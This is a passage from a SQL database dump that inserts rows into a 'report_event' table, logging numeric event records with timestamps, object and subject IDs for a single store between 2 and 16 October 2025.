(20569, '2025-10-02 05:32:23', 1, 2059, 0, 1, 1),
(20570, '2025-10-02 05:32:24', 1, 2053, 0, 1, 1),
(20571, '2025-10-02 05:32:26', 1, 2058, 0, 1, 1),
(20572, '2025-10-02 05:32:28', 1, 2055, 0, 1, 1),
(20573, '2025-10-02 05:32:30', 1, 2062, 0, 1, 1),
(20574, '2025-10-02 05:32:32', 1, 2054, 0, 1, 1),
(20575, '2025-10-02 05:32:46', 1, 2060, 0, 1, 1),
(20576, '2025-10-02 11:40:12', 1, 2061, 0, 1, 1),
(20577, '2025-10-02 12:43:16', 1, 2060, 0, 1, 1),
(20578, '2025-10-02 13:35:22', 1, 2060, 0, 1, 1),
(20579, '2025-10-02 13:54:08', 1, 2054, 0, 1, 1),
(20580, '2025-10-02 16:42:59', 1, 2062, 0, 1, 1),
(20581, '2025-10-02 17:42:39', 1, 2061, 0, 1, 1),
(20582, '2025-10-02 17:56:52', 1, 2059, 0, 1, 1),
(20583, '2025-10-02 19:32:50', 1, 2064, 0, 1, 1),
(20584, '2025-10-03 00:35:20', 1, 2064, 0, 1, 1),
(20585, '2025-10-03 00:37:44', 1, 2061, 0, 1, 1),
(20586, '2025-10-03 00:37:48', 1, 2062, 0, 1, 1),
(20587, '2025-10-03 00:37:52', 1, 2063, 0, 1, 1),
(20588, '2025-10-03 01:46:24', 1, 2053, 0, 1, 1),
(20589, '2025-10-03 03:37:44', 1, 2058, 0, 1, 1),
(20590, '2025-10-03 08:49:27', 1, 2054, 0, 1, 1),
(20591, '2025-10-03 10:40:08', 1, 2054, 0, 1, 1),
(20592, '2025-10-03 11:06:58', 1, 2060, 0, 1, 1),
(20593, '2025-10-03 11:42:43', 1, 2064, 0, 1, 1),
(20594, '2025-10-03 13:19:31', 1, 2064, 0, 1, 1),
(20595, '2025-10-03 13:19:37', 1, 2062, 0, 1, 1),
(20596, '2025-10-03 13:22:44', 1, 2063, 0, 1, 1),
(20597, '2025-10-03 15:55:50', 1, 2064, 0, 1, 1),
(20598, '2025-10-03 16:21:46', 1, 2062, 0, 1, 1),
(20599, '2025-10-03 17:36:30', 1, 2062, 0, 1, 1),
(20600, '2025-10-03 17:41:06', 1, 2060, 0, 1, 1),
(20601, '2025-10-03 22:41:18', 1, 2060, 0, 1, 1),
(20602, '2025-10-03 22:48:03', 1, 2063, 0, 1, 1),
(20603, '2025-10-03 23:03:52', 1, 2058, 0, 1, 1),
(20604, '2025-10-03 23:32:59', 1, 2055, 0, 1, 1),
(20605, '2025-10-04 00:22:53', 1, 2061, 0, 1, 1),
(20606, '2025-10-04 00:51:18', 1, 2062, 0, 1, 1),
(20607, '2025-10-04 01:07:42', 1, 2064, 0, 1, 1),
(20608, '2025-10-04 01:23:55', 1, 2064, 0, 1, 1),
(20609, '2025-10-04 01:25:25', 1, 2063, 0, 1, 1),
(20610, '2025-10-04 01:45:16', 1, 2054, 0, 1, 1),
(20611, '2025-10-04 01:56:56', 1, 2059, 0, 1, 1),
(20612, '2025-10-04 02:06:25', 1, 2064, 0, 1, 1),
(20613, '2025-10-04 02:51:41', 1, 2060, 0, 1, 1),
(20614, '2025-10-04 02:51:56', 1, 2058, 0, 1, 1),
(20615, '2025-10-04 03:01:33', 1, 2061, 0, 1, 1),
(20616, '2025-10-04 04:05:23', 1, 2062, 0, 1, 1),
(20617, '2025-10-04 05:04:51', 1, 2054, 0, 1, 1),
(20618, '2025-10-04 06:22:33', 1, 2054, 0, 1, 1),
(20619, '2025-10-04 06:23:26', 1, 2064, 0, 1, 1),
(20620, '2025-10-04 07:29:01', 1, 2060, 0, 1, 1),
(20621, '2025-10-04 07:35:08', 1, 2063, 0, 1, 1),
(20622, '2025-10-04 07:50:05', 1, 2058, 0, 1, 1),
(20623, '2025-10-04 08:15:21', 1, 2055, 0, 1, 1),
(20624, '2025-10-04 09:02:31', 1, 2061, 0, 1, 1),
(20625, '2025-10-04 09:29:39', 1, 2062, 0, 1, 1),
(20626, '2025-10-04 09:41:12', 1, 2055, 0, 1, 1),
(20627, '2025-10-04 10:01:00', 1, 2062, 0, 1, 1),
(20628, '2025-10-04 10:02:50', 1, 2053, 0, 1, 1),
(20629, '2025-10-04 10:03:19', 1, 2054, 0, 1, 1),
(20630, '2025-10-04 10:03:51', 1, 2055, 0, 1, 1),
(20631, '2025-10-04 10:05:51', 1, 2064, 0, 1, 1),
(20632, '2025-10-04 10:05:55', 1, 2063, 0, 1, 1),
(20633, '2025-10-04 10:06:09', 1, 2060, 0, 1, 1),
(20634, '2025-10-04 10:06:14', 1, 2059, 0, 1, 1),
(20635, '2025-10-04 10:06:19', 1, 2061, 0, 1, 1),
(20636, '2025-10-04 10:06:41', 1, 2058, 0, 1, 1),
(20637, '2025-10-04 10:07:51', 1, 2060, 0, 1, 1),
(20638, '2025-10-04 10:19:53', 1, 2054, 0, 1, 1),
(20639, '2025-10-04 10:31:00', 1, 2059, 0, 1, 1),
(20640, '2025-10-04 10:36:50', 1, 2058, 0, 1, 1),
(20641, '2025-10-04 10:36:59', 1, 2061, 0, 1, 1),
(20642, '2025-10-04 10:37:05', 1, 2064, 0, 1, 1),
(20643, '2025-10-04 10:37:10', 1, 2059, 0, 1, 1),
(20644, '2025-10-04 10:37:18', 1, 2060, 0, 1, 1),
(20645, '2025-10-04 10:37:27', 1, 2062, 0, 1, 1),
(20646, '2025-10-04 10:37:35', 1, 2063, 0, 1, 1),
(20647, '2025-10-04 10:37:43', 1, 2064, 0, 1, 1),
(20648, '2025-10-04 10:39:25', 1, 2055, 0, 1, 1),
(20649, '2025-10-04 10:39:36', 1, 2054, 0, 1, 1),
(20650, '2025-10-04 10:39:46', 1, 2053, 0, 1, 1),
(20651, '2025-10-04 10:39:53', 1, 2064, 0, 1, 1),
(20652, '2025-10-04 13:26:50', 1, 2060, 0, 1, 1),
(20653, '2025-10-04 16:19:36', 1, 2062, 0, 1, 1),
(20654, '2025-10-04 17:23:20', 1, 2058, 0, 1, 1),
(20655, '2025-10-04 17:45:38', 1, 2064, 0, 1, 1),
(20656, '2025-10-04 18:58:18', 1, 2061, 0, 1, 1),
(20657, '2025-10-04 21:06:21', 1, 2061, 0, 1, 1),
(20658, '2025-10-04 21:12:44', 1, 2059, 0, 1, 1),
(20659, '2025-10-04 23:53:50', 1, 2064, 0, 1, 1),
(20660, '2025-10-05 01:34:17', 1, 2054, 0, 1, 1),
(20661, '2025-10-05 04:11:55', 1, 2060, 0, 1, 1),
(20662, '2025-10-05 04:19:44', 1, 2054, 0, 1, 1),
(20663, '2025-10-05 04:45:25', 1, 2064, 0, 1, 1),
(20664, '2025-10-05 05:20:16', 1, 2063, 0, 1, 1),
(20665, '2025-10-05 05:31:14', 1, 2064, 0, 1, 1),
(20666, '2025-10-05 06:33:45', 1, 2053, 0, 1, 1),
(20667, '2025-10-05 07:14:52', 1, 2059, 0, 1, 1),
(20668, '2025-10-05 07:15:00', 1, 2060, 0, 1, 1),
(20669, '2025-10-05 08:30:20', 1, 2064, 0, 1, 1),
(20670, '2025-10-05 08:43:47', 1, 2058, 0, 1, 1),
(20671, '2025-10-05 08:45:42', 1, 2054, 0, 1, 1),
(20672, '2025-10-05 09:36:41', 1, 2060, 0, 1, 1),
(20673, '2025-10-05 11:15:59', 1, 2059, 0, 1, 1),
(20674, '2025-10-05 11:17:40', 1, 2055, 0, 1, 1),
(20675, '2025-10-05 11:18:53', 1, 2062, 0, 1, 1),
(20676, '2025-10-05 11:19:57', 1, 2062, 0, 1, 1),
(20677, '2025-10-05 11:20:25', 1, 2061, 0, 1, 1),
(20678, '2025-10-05 11:21:31', 1, 2063, 0, 1, 1),
(20679, '2025-10-05 11:22:23', 1, 2058, 0, 1, 1),
(20680, '2025-10-05 11:23:42', 1, 2064, 0, 1, 1),
(20681, '2025-10-05 11:25:32', 1, 2060, 0, 1, 1),
(20682, '2025-10-05 11:26:15', 1, 2054, 0, 1, 1),
(20683, '2025-10-05 11:26:24', 1, 2054, 0, 1, 1),
(20684, '2025-10-05 11:46:45', 1, 2055, 0, 1, 1),
(20685, '2025-10-05 12:38:45', 1, 2063, 0, 1, 1),
(20686, '2025-10-05 13:30:47', 1, 2054, 0, 1, 1),
(20687, '2025-10-05 13:30:49', 1, 2055, 0, 1, 1),
(20688, '2025-10-05 13:30:54', 1, 2064, 0, 1, 1),
(20689, '2025-10-05 13:30:56', 1, 2063, 0, 1, 1),
(20690, '2025-10-05 13:30:58', 1, 2062, 0, 1, 1),
(20691, '2025-10-05 13:31:01', 1, 2060, 0, 1, 1),
(20692, '2025-10-05 13:31:03', 1, 2059, 0, 1, 1),
(20693, '2025-10-05 13:31:13', 1, 2061, 0, 1, 1),
(20694, '2025-10-05 13:31:15', 1, 2058, 0, 1, 1),
(20695, '2025-10-05 14:22:14', 1, 2061, 0, 1, 1),
(20696, '2025-10-05 16:42:56', 1, 2062, 0, 1, 1),
(20697, '2025-10-05 16:44:06', 1, 2060, 0, 1, 1),
(20698, '2025-10-05 16:59:21', 1, 2062, 0, 1, 1),
(20699, '2025-10-05 17:42:54', 1, 2064, 0, 1, 1),
(20700, '2025-10-05 17:51:48', 1, 2063, 0, 1, 1),
(20701, '2025-10-05 18:30:52', 1, 2061, 0, 1, 1),
(20702, '2025-10-05 18:42:53', 1, 2062, 0, 1, 1),
(20703, '2025-10-05 19:24:28', 1, 2060, 0, 1, 1),
(20704, '2025-10-05 19:55:50', 1, 2064, 0, 1, 1),
(20705, '2025-10-05 21:46:47', 1, 2054, 0, 1, 1),
(20706, '2025-10-06 00:33:29', 1, 2064, 0, 1, 1),
(20707, '2025-10-06 02:48:46', 1, 2059, 0, 1, 1),
(20708, '2025-10-06 04:14:09', 1, 2059, 0, 1, 1),
(20709, '2025-10-06 04:14:29', 1, 2062, 0, 1, 1),
(20710, '2025-10-06 04:15:03', 1, 2054, 0, 1, 1),
(20711, '2025-10-06 04:15:22', 1, 2061, 0, 1, 1),
(20712, '2025-10-06 04:15:31', 1, 2064, 0, 1, 1),
(20713, '2025-10-06 04:16:22', 1, 2058, 0, 1, 1),
(20714, '2025-10-06 04:17:45', 1, 2063, 0, 1, 1),
(20715, '2025-10-06 04:22:11', 1, 2055, 0, 1, 1),
(20716, '2025-10-06 04:24:12', 1, 2060, 0, 1, 1),
(20717, '2025-10-06 07:47:10', 1, 2054, 0, 1, 1),
(20718, '2025-10-06 07:51:54', 1, 2055, 0, 1, 1),
(20719, '2025-10-06 08:02:24', 1, 2054, 0, 1, 1),
(20720, '2025-10-06 08:54:28', 1, 2060, 0, 1, 1),
(20721, '2025-10-06 16:03:24', 1, 2062, 0, 1, 1),
(20722, '2025-10-06 17:13:53', 1, 2058, 0, 1, 1),
(20723, '2025-10-06 17:46:54', 1, 2060, 0, 1, 1),
(20724, '2025-10-06 18:18:14', 1, 2064, 0, 1, 1),
(20725, '2025-10-06 19:09:18', 1, 2064, 0, 1, 1),
(20726, '2025-10-06 19:23:31', 1, 2059, 0, 1, 1),
(20727, '2025-10-06 19:32:40', 1, 2058, 0, 1, 1),
(20728, '2025-10-06 20:36:33', 1, 2064, 0, 1, 1),
(20729, '2025-10-06 22:40:31', 1, 2064, 0, 1, 1),
(20730, '2025-10-06 22:58:30', 1, 2063, 0, 1, 1),
(20731, '2025-10-06 23:01:38', 1, 2053, 0, 1, 1),
(20732, '2025-10-07 01:31:55', 1, 2059, 0, 1, 1),
(20733, '2025-10-07 02:08:08', 1, 2064, 0, 1, 1),
(20734, '2025-10-07 03:20:01', 1, 2059, 0, 1, 1),
(20735, '2025-10-07 05:20:15', 1, 2063, 0, 1, 1),
(20736, '2025-10-07 06:23:11', 1, 2064, 0, 1, 1),
(20737, '2025-10-07 06:23:15', 1, 2064, 0, 1, 1),
(20738, '2025-10-07 06:29:33', 1, 2060, 0, 1, 1),
(20739, '2025-10-07 06:53:43', 1, 2059, 0, 1, 1),
(20740, '2025-10-07 07:19:03', 1, 2064, 0, 1, 1),
(20741, '2025-10-07 13:54:29', 1, 2064, 3763, 1, 1),
(20742, '2025-10-07 13:54:31', 1, 2064, 3763, 1, 1),
(20743, '2025-10-07 15:59:28', 1, 2062, 0, 1, 1),
(20744, '2025-10-07 16:10:18', 1, 2060, 0, 1, 1),
(20745, '2025-10-07 18:08:12', 1, 2062, 0, 1, 1),
(20746, '2025-10-07 19:57:23', 1, 2054, 0, 1, 1),
(20747, '2025-10-07 19:57:27', 1, 2058, 0, 1, 1),
(20748, '2025-10-07 23:30:29', 1, 2058, 0, 1, 1),
(20749, '2025-10-08 03:28:47', 1, 2064, 0, 1, 1),
(20750, '2025-10-08 06:21:14', 1, 2064, 0, 1, 1),
(20751, '2025-10-08 07:03:01', 1, 2061, 0, 1, 1),
(20752, '2025-10-08 07:47:00', 1, 2058, 0, 1, 1),
(20753, '2025-10-08 11:16:29', 1, 2060, 0, 1, 1),
(20754, '2025-10-08 13:45:33', 1, 2060, 0, 1, 1),
(20755, '2025-10-08 13:47:18', 1, 2064, 0, 1, 1),
(20756, '2025-10-08 14:22:52', 1, 2064, 0, 1, 1),
(20757, '2025-10-08 14:22:57', 1, 2064, 0, 1, 1),
(20758, '2025-10-08 15:48:16', 1, 2060, 0, 1, 1),
(20759, '2025-10-08 16:18:12', 1, 2062, 0, 1, 1),
(20760, '2025-10-09 01:44:44', 1, 2053, 0, 1, 1),
(20761, '2025-10-09 05:09:49', 1, 2064, 3768, 1, 1),
(20762, '2025-10-09 06:17:51', 1, 2060, 0, 1, 1),
(20763, '2025-10-09 06:38:06', 1, 2055, 0, 1, 1),
(20764, '2025-10-09 07:07:56', 1, 2064, 0, 1, 1),
(20765, '2025-10-09 08:48:30', 1, 2054, 0, 1, 1),
(20766, '2025-10-09 09:20:57', 1, 2054, 0, 1, 1),
(20767, '2025-10-09 11:40:44', 1, 2054, 0, 1, 1),
(20768, '2025-10-09 12:17:49', 1, 2063, 0, 1, 1),
(20769, '2025-10-09 12:19:25', 1, 2059, 0, 1, 1),
(20770, '2025-10-09 12:21:17', 1, 2055, 0, 1, 1),
(20771, '2025-10-09 12:22:04', 1, 2064, 0, 1, 1),
(20772, '2025-10-09 14:22:14', 1, 2064, 0, 1, 1),
(20773, '2025-10-09 16:35:03', 1, 2060, 0, 1, 1),
(20774, '2025-10-09 16:51:05', 1, 2054, 0, 1, 1),
(20775, '2025-10-09 17:08:22', 1, 2062, 0, 1, 1),
(20776, '2025-10-09 18:21:36', 1, 2059, 0, 1, 1),
(20777, '2025-10-09 22:13:14', 1, 2064, 0, 1, 1),
(20778, '2025-10-09 22:24:11', 1, 2060, 0, 1, 1),
(20779, '2025-10-09 22:41:06', 1, 2062, 0, 1, 1),
(20780, '2025-10-09 22:41:10', 1, 2063, 0, 1, 1),
(20781, '2025-10-09 22:41:18', 1, 2061, 0, 1, 1),
(20782, '2025-10-09 22:59:27', 1, 2061, 0, 1, 1),
(20783, '2025-10-10 01:50:42', 1, 2053, 0, 1, 1),
(20784, '2025-10-10 01:59:22', 1, 2062, 0, 1, 1),
(20785, '2025-10-10 02:04:30', 1, 2059, 0, 1, 1),
(20786, '2025-10-10 02:07:07', 1, 2064, 0, 1, 1),
(20787, '2025-10-10 03:50:06', 1, 2054, 0, 1, 1),
(20788, '2025-10-10 04:18:25', 1, 2054, 0, 1, 1),
(20789, '2025-10-10 04:21:01', 1, 2063, 0, 1, 1),
(20790, '2025-10-10 04:47:28', 1, 2060, 0, 1, 1),
(20791, '2025-10-10 06:53:51', 1, 2060, 0, 1, 1),
(20792, '2025-10-10 07:13:19', 1, 2062, 0, 1, 1),
(20793, '2025-10-10 07:16:24', 1, 2053, 0, 1, 1),
(20794, '2025-10-10 15:20:24', 1, 2055, 0, 1, 1),
(20795, '2025-10-10 16:29:21', 1, 2061, 0, 1, 1),
(20796, '2025-10-10 16:40:08', 1, 2055, 0, 1, 1),
(20797, '2025-10-10 16:50:37', 1, 2054, 0, 1, 1),
(20798, '2025-10-10 16:51:11', 1, 2062, 0, 1, 1),
(20799, '2025-10-10 16:51:25', 1, 2062, 0, 1, 1),
(20800, '2025-10-10 17:09:01', 1, 2062, 0, 1, 1),
(20801, '2025-10-10 17:24:50', 1, 2060, 0, 1, 1),
(20802, '2025-10-10 18:41:52', 1, 2064, 0, 1, 1),
(20803, '2025-10-10 18:48:46', 1, 2064, 0, 1, 1),
(20804, '2025-10-10 19:10:11', 1, 2060, 0, 1, 1),
(20805, '2025-10-10 19:58:54', 1, 2058, 0, 1, 1),
(20806, '2025-10-10 20:00:17', 1, 2064, 0, 1, 1),
(20807, '2025-10-10 21:19:58', 1, 2054, 0, 1, 1),
(20808, '2025-10-10 22:21:19', 1, 2054, 0, 1, 1),
(20809, '2025-10-10 23:31:09', 1, 2064, 0, 1, 1),
(20810, '2025-10-11 05:08:40', 1, 2064, 0, 1, 1),
(20811, '2025-10-11 05:38:10', 1, 2061, 0, 1, 1),
(20812, '2025-10-11 05:41:18', 1, 2054, 0, 1, 1),
(20813, '2025-10-11 05:42:00', 1, 2058, 0, 1, 1),
(20814, '2025-10-11 06:27:46', 1, 2054, 0, 1, 1),
(20815, '2025-10-11 06:33:54', 1, 2063, 0, 1, 1),
(20816, '2025-10-11 06:37:25', 1, 2059, 0, 1, 1),
(20817, '2025-10-11 07:37:17', 1, 2063, 0, 1, 1),
(20818, '2025-10-11 09:34:55', 1, 2060, 0, 1, 1),
(20819, '2025-10-11 12:48:56', 1, 2055, 0, 1, 1),
(20820, '2025-10-11 14:20:26', 1, 2064, 0, 1, 1),
(20821, '2025-10-11 15:13:46', 1, 2059, 0, 1, 1),
(20822, '2025-10-11 15:20:01', 1, 2063, 0, 1, 1),
(20823, '2025-10-11 16:36:17', 1, 2062, 0, 1, 1),
(20824, '2025-10-11 16:37:07', 1, 2062, 0, 1, 1),
(20825, '2025-10-11 17:29:41', 1, 2060, 0, 1, 1),
(20826, '2025-10-11 17:54:09', 1, 2064, 3784, 1, 1),
(20827, '2025-10-11 18:06:14', 1, 2064, 0, 1, 1),
(20828, '2025-10-11 18:14:14', 1, 2059, 0, 1, 1),
(20829, '2025-10-11 18:26:31', 1, 2058, 0, 1, 1),
(20830, '2025-10-11 23:33:39', 1, 2062, 0, 1, 1),
(20831, '2025-10-11 23:57:49', 1, 2058, 0, 1, 1),
(20832, '2025-10-12 00:32:13', 1, 2059, 0, 1, 1),
(20833, '2025-10-12 04:47:39', 1, 2064, 0, 1, 1),
(20834, '2025-10-12 05:57:00', 1, 2061, 0, 1, 1),
(20835, '2025-10-12 06:49:24', 1, 2060, 0, 1, 1),
(20836, '2025-10-12 06:49:30', 1, 2059, 0, 1, 1),
(20837, '2025-10-12 07:42:06', 1, 2054, 0, 1, 1),
(20838, '2025-10-12 08:48:33', 1, 2058, 0, 1, 1),
(20839, '2025-10-12 09:25:54', 1, 2064, 0, 1, 1),
(20840, '2025-10-12 10:24:55', 1, 2064, 0, 1, 1),
(20841, '2025-10-12 10:32:10', 1, 2060, 0, 1, 1),
(20842, '2025-10-12 10:44:15', 1, 2054, 0, 1, 1),
(20843, '2025-10-12 11:09:31', 1, 2064, 0, 1, 1),
(20844, '2025-10-12 13:07:16', 1, 2062, 0, 1, 1),
(20845, '2025-10-12 14:34:26', 1, 2060, 0, 1, 1),
(20846, '2025-10-12 14:37:14', 1, 2060, 0, 1, 1),
(20847, '2025-10-12 16:11:36', 1, 2061, 0, 1, 1),
(20848, '2025-10-12 16:18:29', 1, 2062, 0, 1, 1),
(20849, '2025-10-12 16:27:04', 1, 2062, 0, 1, 1),
(20850, '2025-10-12 19:02:22', 1, 2060, 0, 1, 1),
(20851, '2025-10-12 19:25:24', 1, 2062, 0, 1, 1),
(20852, '2025-10-12 20:34:03', 1, 2060, 0, 1, 1),
(20853, '2025-10-12 20:44:25', 1, 2054, 0, 1, 1),
(20854, '2025-10-12 21:21:46', 1, 2063, 0, 1, 1),
(20855, '2025-10-12 21:22:06', 1, 2061, 0, 1, 1),
(20856, '2025-10-12 21:50:53', 1, 2060, 0, 1, 1),
(20857, '2025-10-12 21:51:39', 1, 2054, 0, 1, 1),
(20858, '2025-10-12 23:30:47', 1, 2064, 0, 1, 1),
(20859, '2025-10-13 01:26:23', 1, 2061, 0, 1, 1),
(20860, '2025-10-13 03:07:10', 1, 2063, 0, 1, 1),
(20861, '2025-10-13 05:05:25', 1, 2059, 0, 1, 1),
(20862, '2025-10-13 05:13:57', 1, 2061, 0, 1, 1),
(20863, '2025-10-13 07:07:33', 1, 2060, 0, 1, 1),
(20864, '2025-10-13 07:36:11', 1, 2064, 0, 1, 1),
(20865, '2025-10-13 07:50:15', 1, 2059, 0, 1, 1),
(20866, '2025-10-13 10:09:59', 1, 2061, 0, 1, 1),
(20867, '2025-10-13 10:19:34', 1, 2064, 3792, 1, 1),
(20868, '2025-10-13 10:40:41', 1, 2054, 0, 1, 1),
(20869, '2025-10-13 10:57:10', 1, 2059, 0, 1, 1),
(20870, '2025-10-13 10:57:16', 1, 2058, 0, 1, 1),
(20871, '2025-10-13 11:49:57', 1, 2058, 0, 1, 1),
(20872, '2025-10-13 11:57:02', 1, 2054, 0, 1, 1),
(20873, '2025-10-13 14:20:56', 1, 2064, 0, 1, 1),
(20874, '2025-10-13 15:25:01', 1, 2058, 0, 1, 1),
(20875, '2025-10-13 15:29:09', 1, 2062, 0, 1, 1),
(20876, '2025-10-13 15:29:42', 1, 2062, 0, 1, 1),
(20877, '2025-10-13 17:05:48', 1, 2059, 0, 1, 1),
(20878, '2025-10-13 17:57:46', 1, 2054, 0, 1, 1),
(20879, '2025-10-13 18:42:35', 1, 2060, 0, 1, 1),
(20880, '2025-10-13 20:20:02', 1, 2064, 0, 1, 1),
(20881, '2025-10-13 21:52:39', 1, 2064, 0, 1, 1),
(20882, '2025-10-13 23:36:10', 1, 2054, 0, 1, 1),
(20883, '2025-10-14 07:15:28', 1, 2060, 0, 1, 1),
(20884, '2025-10-14 08:37:54', 1, 2060, 0, 1, 1),
(20885, '2025-10-14 09:25:59', 1, 2064, 0, 1, 1),
(20886, '2025-10-14 09:39:49', 1, 2054, 0, 1, 1),
(20887, '2025-10-14 10:32:35', 1, 2059, 0, 1, 1),
(20888, '2025-10-14 10:55:57', 1, 2054, 0, 1, 1),
(20889, '2025-10-14 11:24:06', 1, 2058, 0, 1, 1),
(20890, '2025-10-14 11:44:14', 1, 2060, 0, 1, 1),
(20891, '2025-10-14 11:54:49', 1, 2064, 0, 1, 1),
(20892, '2025-10-14 12:02:16', 1, 2062, 0, 1, 1),
(20893, '2025-10-14 12:02:21', 1, 2064, 0, 1, 1),
(20894, '2025-10-14 12:02:23', 1, 2063, 0, 1, 1),
(20895, '2025-10-14 12:02:36', 1, 2053, 0, 1, 1),
(20896, '2025-10-14 12:12:15', 1, 2061, 0, 1, 1),
(20897, '2025-10-14 14:03:37', 1, 2060, 0, 1, 1),
(20898, '2025-10-14 14:12:11', 1, 2063, 0, 1, 1),
(20899, '2025-10-14 14:34:51', 1, 2058, 0, 1, 1),
(20900, '2025-10-14 15:15:53', 1, 2055, 0, 1, 1),
(20901, '2025-10-14 15:28:25', 1, 2060, 0, 1, 1),
(20902, '2025-10-14 15:28:28', 1, 2060, 0, 1, 1),
(20903, '2025-10-14 15:39:53', 1, 2062, 0, 1, 1),
(20904, '2025-10-14 16:21:21', 1, 2061, 0, 1, 1),
(20905, '2025-10-14 16:55:25', 1, 2062, 0, 1, 1),
(20906, '2025-10-14 18:00:49', 1, 2054, 0, 1, 1),
(20907, '2025-10-14 18:27:07', 1, 2060, 0, 1, 1),
(20908, '2025-10-14 18:35:06', 1, 2063, 0, 1, 1),
(20909, '2025-10-14 18:56:23', 1, 2058, 0, 1, 1),
(20910, '2025-10-14 19:18:10', 1, 2062, 0, 1, 1),
(20911, '2025-10-14 19:37:31', 1, 2055, 0, 1, 1),
(20912, '2025-10-14 19:42:28', 1, 2058, 0, 1, 1),
(20913, '2025-10-14 19:42:32', 1, 2054, 0, 1, 1),
(20914, '2025-10-14 20:43:44', 1, 2061, 0, 1, 1),
(20915, '2025-10-14 20:53:38', 1, 2064, 0, 1, 1),
(20916, '2025-10-14 21:19:07', 1, 2062, 0, 1, 1),
(20917, '2025-10-14 21:55:22', 1, 2054, 0, 1, 1),
(20918, '2025-10-14 22:23:32', 1, 2054, 0, 1, 1),
(20919, '2025-10-14 22:25:12', 1, 2064, 0, 1, 1),
(20920, '2025-10-14 22:38:18', 1, 2059, 0, 1, 1),
(20921, '2025-10-14 22:51:51', 1, 2064, 0, 1, 1),
(20922, '2025-10-14 23:00:22', 1, 2054, 0, 1, 1),
(20923, '2025-10-14 23:52:39', 1, 2054, 0, 1, 1),
(20924, '2025-10-15 00:26:16', 1, 2064, 0, 1, 1),
(20925, '2025-10-15 01:45:03', 1, 2062, 0, 1, 1),
(20926, '2025-10-15 03:43:12', 1, 2060, 0, 1, 1),
(20927, '2025-10-15 04:32:12', 1, 2059, 0, 1, 1),
(20928, '2025-10-15 07:35:33', 1, 2054, 0, 1, 1),
(20929, '2025-10-15 09:17:35', 1, 2054, 0, 1, 1),
(20930, '2025-10-15 09:17:39', 1, 2055, 0, 1, 1),
(20931, '2025-10-15 09:17:41', 1, 2058, 0, 1, 1),
(20932, '2025-10-15 09:17:44', 1, 2059, 0, 1, 1),
(20933, '2025-10-15 09:17:46', 1, 2060, 0, 1, 1),
(20934, '2025-10-15 09:17:48', 1, 2061, 0, 1, 1),
(20935, '2025-10-15 09:17:51', 1, 2062, 0, 1, 1),
(20936, '2025-10-15 09:17:54', 1, 2063, 0, 1, 1),
(20937, '2025-10-15 09:18:03', 1, 2064, 0, 1, 1),
(20938, '2025-10-15 09:18:06', 1, 2064, 0, 1, 1),
(20939, '2025-10-15 09:18:09', 1, 2064, 0, 1, 1),
(20940, '2025-10-15 11:46:44', 1, 2064, 0, 1, 1),
(20941, '2025-10-15 11:57:20', 1, 2060, 0, 1, 1),
(20942, '2025-10-15 13:02:07', 1, 2064, 0, 1, 1),
(20943, '2025-10-15 13:50:33', 1, 2064, 0, 1, 1),
(20944, '2025-10-15 13:56:33', 1, 2060, 0, 1, 1),
(20945, '2025-10-15 14:32:11', 1, 2054, 0, 1, 1),
(20946, '2025-10-15 15:23:47', 1, 2061, 0, 1, 1),
(20947, '2025-10-15 15:34:49', 1, 2060, 0, 1, 1),
(20948, '2025-10-15 15:50:52', 1, 2062, 0, 1, 1),
(20949, '2025-10-15 16:26:00', 1, 2062, 0, 1, 1),
(20950, '2025-10-15 16:50:44', 1, 2062, 0, 1, 1),
(20951, '2025-10-15 17:30:37', 1, 2064, 0, 1, 1);
INSERT INTO `report_event` (`event_id`, `logged_at`, `event_type_id`, `object_id`, `subject_id`, `subtype`, `store_id`) VALUES
(20952, '2025-10-15 18:58:13', 1, 2063, 0, 1, 1),
(20953, '2025-10-15 23:53:49', 1, 2060, 0, 1, 1),
(20954, '2025-10-16 01:19:29', 1, 2064, 0, 1, 1),
(20955, '2025-10-16 01:28:24', 1, 2058, 0, 1, 1),
(20956, '2025-10-16 03:07:06', 1, 2064, 0, 1, 1),
(20957, '2025-10-16 03:39:14', 1, 2063, 0, 1, 1),
(20958, '2025-10-16 04:07:34', 1, 2055, 0, 1, 1),
(20959, '2025-10-16 04:50:38', 1, 2060, 0, 1, 1),
(20960, '2025-10-16 05:01:51', 1, 2064, 0, 1, 1),
(20961, '2025-10-16 05:10:45', 1, 2063, 0, 1, 1),
(20962, '2025-10-16 05:20:46', 1, 2060, 0, 1, 1),
(20963, '2025-10-16 05:31:16', 1, 2061, 0, 1, 1),
(20964, '2025-10-16 05:39:06', 1, 2063, 0, 1, 1),
(20965, '2025-10-16 05:40:41', 1, 2055, 0, 1, 1),
(20966, '2025-10-16 05:50:13', 1, 2054, 0, 1, 1),
(20967, '2025-10-16 06:08:19', 1, 2058, 0, 1, 1),
(20968, '2025-10-16 06:55:37', 1, 2054, 0, 1, 1),
(20969, '2025-10-16 07:00:30', 1, 2054, 0, 1, 1),
(20970, '2025-10-16 07:00:35', 1, 2061, 0, 1, 1),
(20971, '2025-10-16 07:20:08', 1, 2064, 0, 1, 1),
(20972, '2025-10-16 07:23:28', 1, 2064, 0, 1, 1),
(20973, '2025-10-16 07:58:52', 1, 2055, 0, 1, 1),
(20974, '2025-10-16 08:41:41', 1, 2060, 0, 1, 1),
(20975, '2025-10-16 08:51:56', 1, 2062, 0, 1, 1),
(20976, '2025-10-16 08:52:03', 1, 2059, 0, 1, 1),
(20977, '2025-10-16 11:25:39', 1, 2064, 0, 1, 1),
(20978, '2025-10-16 12:18:41', 1, 2059, 0, 1, 1),
(20979, '2025-10-16 12:18:55', 1, 2060, 0, 1, 1),
(20980, '2025-10-16 13:01:59', 1, 2064, 0, 1, 1),
(20981, '2025-10-16 14:59:04', 1, 2064, 0, 1, 1),
(20982, '2025-10-16 15:49:15', 1, 2063, 0, 1, 1),
(20983, '2025-10-16 15:55:15', 1, 2062, 0, 1, 1),
(20984, '2025-10-16 16:31:54', 1, 2064, 0, 1, 1),
(20985, '2025-10-16 16:41:32', 1, 2059, 0, 1, 1),
(20986, '2025-10-16 16:55:10', 1, 2058, 0, 1, 1),
(20987, '2025-10-16 17:45:55', 1, 2059, 0, 1, 1),
(20988, '2025-10-16 19:46:51', 1, 2062, 0, 1, 1),
(20989, '2025-10-16 19:48:10', 1, 2064, 0, 1, 1),
(20990, '2025-10-16 20:30:39', 1, 2064, 0, 1, 1),
(20991, '2025-10-16 20:51:09', 1, 2063, 0, 1, 1),
(20992, '2025-10-16 20:55:24', 1, 2054, 0, 1, 1),
(20993, '2025-10-16 22:15:32', 1, 2064, 0, 1, 1),
(20994, '2025-10-16 22:40:59', 1, 2061, 0, 1, 1),
